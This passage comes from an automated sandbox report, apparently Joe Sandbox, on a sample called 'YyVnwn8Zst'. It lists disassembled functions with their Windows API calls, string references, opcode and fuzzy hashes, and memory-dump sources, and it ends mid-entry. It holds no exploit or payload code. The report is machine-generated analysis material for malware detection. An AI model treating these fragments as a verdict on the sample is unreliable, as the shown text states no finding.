Instruction Fuzzy Hash: 2801E53254021DBBCF12AFA2DC02DEE7FA6EF08760F144194FE1466161CB728935EB90

Function 00BE9C5D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BE92EC), ref: 00BE9CA8

Strings

InitializeCriticalSectionEx, xrefs: 00BE9C78

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 2487950fc1f8e7585336597e930705c22769d8977a3c23006ad2e79e6fb1df7e
Instruction ID: bc941f7ba2a0ad96b5cae5c72d02d010c998ebbd1fa508c2988ce4d62db0b6c7
Opcode Fuzzy Hash: 2487950fc1f8e7585336597e930705c22769d8977a3c23006ad2e79e6fb1df7e
Instruction Fuzzy Hash: 7FF0BE31A4121CBBCB156F62CD02CBE7FE1EB08720B1140A5FE095B260CF728E14EB90

Function 00BE9B02 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00BE9B41

Strings

FlsAlloc, xrefs: 00BE9B1D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 3356adc42a4705050ddcae02bdb75ff8fe9b38c0e77be3558382b691c000ab85
Instruction ID: e8a96b1bbd674730df88b81503c9be86a0b9014896394d9cbb71f2798d98d1a6
Opcode Fuzzy Hash: 3356adc42a4705050ddcae02bdb75ff8fe9b38c0e77be3558382b691c000ab85
Instruction Fuzzy Hash: 6EE0E531A4121CA786216B729C42D7EBBE4DB15710B0000D9FD0667250DE709E05D6D9

Function 00BE2877 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00BE288C

Strings

FlsAlloc, xrefs: 00BE287B, 00BE2885

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: f2306f0a67b20b8cd91cdfc9e6388fb66b4a26b76c0f0da364d26e95c4f13348
Instruction ID: 5c537bcebc984be50fca300cbeed5ead46a08013175ce515ce9b9e849b092100
Opcode Fuzzy Hash: f2306f0a67b20b8cd91cdfc9e6388fb66b4a26b76c0f0da364d26e95c4f13348
Instruction Fuzzy Hash: 8DD05B3178532C77951033D55C029BBBAD9DB01BB1F0500F1FF1C67251DB55595581D9

Function 00BEA8CE Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00BEA4A1: GetOEMCP.KERNEL32(00000000,?,?,00BEA72A,?), ref: 00BEA4CC

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BEA76F,?,00000000), ref: 00BEA942
GetCPInfo.KERNEL32(00000000,00BEA76F,?,?,?,00BEA76F,?,00000000), ref: 00BEA955

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 164c79aaceafe109fcaee66a7b1a60fe2fc270472d153002b922e9b3e01792c7
Instruction ID: 949bae3f24b257fc4566759e4798545e26bd3e396e8b39be5fb4f8af9a9b752f
Opcode Fuzzy Hash: 164c79aaceafe109fcaee66a7b1a60fe2fc270472d153002b922e9b3e01792c7
Instruction Fuzzy Hash: 605126749003859EDB20DF76C8856BABBEDEF41300F1580AED0968B252D739B945CB92

Function 00BC1373 Relevance: 3.1, APIs: 2, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC1373

Part of subcall function 00BC5FC6: __EH_prolog.LIBCMT ref: 00BC5FCB

Part of subcall function 00BCC567: __EH_prolog.LIBCMT ref: 00BCC56C
Part of subcall function 00BCC567: new.LIBCMT ref: 00BCC5AF
Part of subcall function 00BCC567: new.LIBCMT ref: 00BCC5D3

new.LIBCMT ref: 00BC13EB

Part of subcall function 00BCADBF: __EH_prolog.LIBCMT ref: 00BCADC4

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5384d23d4ac857707c6d2615fdbe80c7ef91472ef31dbde5e93948f430a6b003
Instruction ID: a18f4337cdd6d16efc8aa347be029c90a84ccc17deedd698fe177af89c408331
Opcode Fuzzy Hash: 5384d23d4ac857707c6d2615fdbe80c7ef91472ef31dbde5e93948f430a6b003
Instruction Fuzzy Hash: CE4144B0805B40DEE724DF798485AE6FBE5FF29300F404AAED5EE83282DB326554CB11

Function 00BC136E Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BC1373

Part of subcall function 00BC5FC6: __EH_prolog.LIBCMT ref: 00BC5FCB

Part of subcall function 00BCC567: __EH_prolog.LIBCMT ref: 00BCC56C
Part of subcall function 00BCC567: new.LIBCMT ref: 00BCC5AF
Part of subcall function 00BCC567: new.LIBCMT ref: 00BCC5D3

new.LIBCMT ref: 00BC13EB

Part of subcall function 00BCADBF: __EH_prolog.LIBCMT ref: 00BCADC4

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2f0189748874913e64bcf8f32130ff06915231534031e96bd91fe08aa8817cde
Instruction ID: 2d703f3f9a319387579603641792655b138c444683594d4efcf9713ea0f61ae7
Opcode Fuzzy Hash: 2f0189748874913e64bcf8f32130ff06915231534031e96bd91fe08aa8817cde
Instruction Fuzzy Hash: AB4146B0805B40DEE724DF798485AE6FBE5FF29300F504AAED5EE83282DB326554CB11

Function 00BEA70D Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00BE8571: GetLastError.KERNEL32(?,?,00BE33F4,?,?,?,00BE2E6F,00000050), ref: 00BE8575
Part of subcall function 00BE8571: _free.LIBCMT ref: 00BE85A8
Part of subcall function 00BE8571: SetLastError.KERNEL32(00000000), ref: 00BE85E9
Part of subcall function 00BE8571: _abort.LIBCMT ref: 00BE85EF

Part of subcall function 00BEA82C: _abort.LIBCMT ref: 00BEA85E
Part of subcall function 00BEA82C: _free.LIBCMT ref: 00BEA892

Part of subcall function 00BEA4A1: GetOEMCP.KERNEL32(00000000,?,?,00BEA72A,?), ref: 00BEA4CC

_free.LIBCMT ref: 00BEA785
_free.LIBCMT ref: 00BEA7BB

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 30b2f7006d2d4f6a70b5b82b22f42c117fdce198ae72d18b2800592cd3a23a23
Instruction ID: 17a9aeaa649896ebf4d243c92e39b3311d784bc44d62366dd2c3276490a5f94d
Opcode Fuzzy Hash: 30b2f7006d2d4f6a70b5b82b22f42c117fdce198ae72d18b2800592cd3a23a23
Instruction Fuzzy Hash: 5B310931904284AFDB11EF6AD480BADB7F9EF40320F2541E9F4149B2A2EF75AD41CB51

Function 00BC95C0 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00BC9C97,?,?,00BC779F), ref: 00BC9648
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00BC9C97,?,?,00BC779F), ref: 00BC967D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 60b07eb14e46c2069ddc698ac313da88481c99f76a2e1a7da3a71a5bb1deb739
Instruction ID: dbeb06893125e8ce93fd1b15787de5d0a9ac384cdaed28e116719a1d5da9a318
Opcode Fuzzy Hash: 60b07eb14e46c2069ddc698ac313da88481c99f76a2e1a7da3a71a5bb1deb739
Instruction Fuzzy Hash: B221F1B1500748AFE7308F24C889FA7B7E8EB493A4F004A6DF5E5831D1C775AC49CA60

Function 00BC9B22 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00BC747F,?,?,?), ref: 00BC9B3C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00BC9BEC

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: f19d527522d4e83c7be16162863b2d2dfb77d5fa1fa46ea96d6c019274d19a58
Instruction ID: 4b4964bf784d36e13b1dd79adcb88716026449c5fbf5ec02d05bde66e3cca51e
Opcode Fuzzy Hash: f19d527522d4e83c7be16162863b2d2dfb77d5fa1fa46ea96d6c019274d19a58
Instruction Fuzzy Hash: AD21F131258285BBE710DF24E889FBABBE8EF96704F04499DB891C3141D729ED08D7A1

Function 00BE99EB Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00BE9A4B
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BE9A58

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 6376952fb042a5e8c06734d99188298e7eb315823f0cbf845cf9b53bf892e7c6
Instruction ID: ad67d602d4cbac0711b1ac8061f613c5cce3982ed9ecd41cc851f54e4dd09118
Opcode Fuzzy Hash: 6376952fb042a5e8c06734d99188298e7eb315823f0cbf845cf9b53bf892e7c6
Instruction Fuzzy Hash: 5011C637A015A1AB9B25DF2AEC809AA73D6EF8176071652B0FD15EB284DB30EC45C7D0

Function 00BC9BFB Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00BC9C31
GetLastError.KERNEL32 ref: 00BC9C3D

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7e5070bb65ee250ae16c9ef08bc9f42d476e8ca828e735175a680441c1270f6a
Instruction ID: 7372b615d28758ee05570b5bf599577fef5bdd6958c21d8a26d658a29617fe15
Opcode Fuzzy Hash: 7e5070bb65ee250ae16c9ef08bc9f42d476e8ca828e735175a680441c1270f6a
Instruction Fuzzy Hash: 7B019EB13002406BEB349F29DC88FABB7D9DB84318F1445BEB252C3680CA74D808C621

Function 00BC99A7 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00BC99FB
GetLastError.KERNEL32 ref: 00BC9A08

Part of subcall function 00BC9779: __EH_prolog.LIBCMT ref: 00BC977E

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ErrorFileH_prologLastPointer
String ID:
API String ID: 4236474358-0
Opcode ID: c544fb53cff2e643f1fa778a2beb2cfb9612f29dea541a5376b0d486d2efe12a
Instruction ID: dc3c6eb310653d51688a88a2f3813fd9ecea607ea20d7479cb5af6af68616b56
Opcode Fuzzy Hash: c544fb53cff2e643f1fa778a2beb2cfb9612f29dea541a5376b0d486d2efe12a
Instruction Fuzzy Hash: 9501B532201105DBAF188F299C9DFBA77D9EF5272030442AEF826DB2A1CBB0DC01C660

Function 00BE7BEE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE7C0F

Part of subcall function 00BE7B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BE3006,?,0000015D,?,?,?,?,00BE44E2,000000FF,00000000,?,?), ref: 00BE7B32

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00C000E0,00BCCB6A,?,?,?,?,?,?), ref: 00BE7C4B

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 2f01170418a506b995985e5821590e8c93fb3c5c575e209e28df3f58496ba148
Instruction ID: eb9a8fc89fe489a7fc41f12ac63b4f80946bcc3a776689e0cd6c72913ad83ed7
Opcode Fuzzy Hash: 2f01170418a506b995985e5821590e8c93fb3c5c575e209e28df3f58496ba148
Instruction Fuzzy Hash: 13F0C2315885D16A8B312A2B9C41F6F27ECDF91770B3405A6F815A6292EF30C84091A1

Function 00BD058E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00BD059B
GetProcessAffinityMask.KERNEL32(00000000), ref: 00BD05A2

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 327651cd2aa639f34d89065274af0e2e51713f40e58f13fe77c8f8058d0dca2a
Instruction ID: 423d0c4488a4be06e8a324289d35b39a035398ba7488287d4243360aa1ff71c9
Opcode Fuzzy Hash: 327651cd2aa639f34d89065274af0e2e51713f40e58f13fe77c8f8058d0dca2a
Instruction Fuzzy Hash: E3E09B36A21205B74F1897B5AC846FBB7DDDA14308B1041BBEC06D3300FD31ED014B64

Function 00BCA1D3 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BCA009,?,?,?,00BC9EA2,?,00000001,00000000,?,?), ref: 00BCA1E7
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BCA009,?,?,?,00BC9EA2,?,00000001,00000000,?,?), ref: 00BCA218

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 67857078c177be8cd5c6f5cd6064ce123390c2e5501bd9d84dc86acd979774b9
Instruction ID: 1e2eda2913b1089086261b3b3c880b23f16feeee8fa389c73d183fd956c17a6d
Opcode Fuzzy Hash: 67857078c177be8cd5c6f5cd6064ce123390c2e5501bd9d84dc86acd979774b9
Instruction Fuzzy Hash: EEF0303254015D6BDF015F64EC41FE977ACEF08396F448195BC8897160DF329A99EA50

Function 00BDCBAD Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BDCBDB
SetDlgItemTextW.USER32(00000065,?), ref: 00BDCBF2

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: a0e2aa1e0c6e841b116113058c74f502947c1a358e8d09f882dcd60ec2d348db
Instruction ID: 6185b15e2d42913a7727db724f7873bfdf0a24626d231d84a244add107436ef5
Opcode Fuzzy Hash: a0e2aa1e0c6e841b116113058c74f502947c1a358e8d09f882dcd60ec2d348db
Instruction Fuzzy Hash: 4AF0E57690820C2AE711AB749C07FED7BADD704741F0445DBB605631A2E572AA60CB62

Function 00BC9EBC Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,00BC96E0,?,?,00BC953B), ref: 00BC9ECD
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00BC96E0,?,?,00BC953B), ref: 00BC9EFB

Memory Dump Source

Source File: 00000000.00000002.2125519220.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.2125474990.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125544070.0000000000BF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000BFD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C04000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125560163.0000000000C20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2125644304.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_YyVnwn8Zst.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 77a0d0fbbe9c4de77a7754eb5326555ea58ebef9930c68340244a53f9bd071d8
Instruction ID: 317416d0c2be28bcf3c973299beec3d6b1188dbb18568c617f52f343ed64c3b4
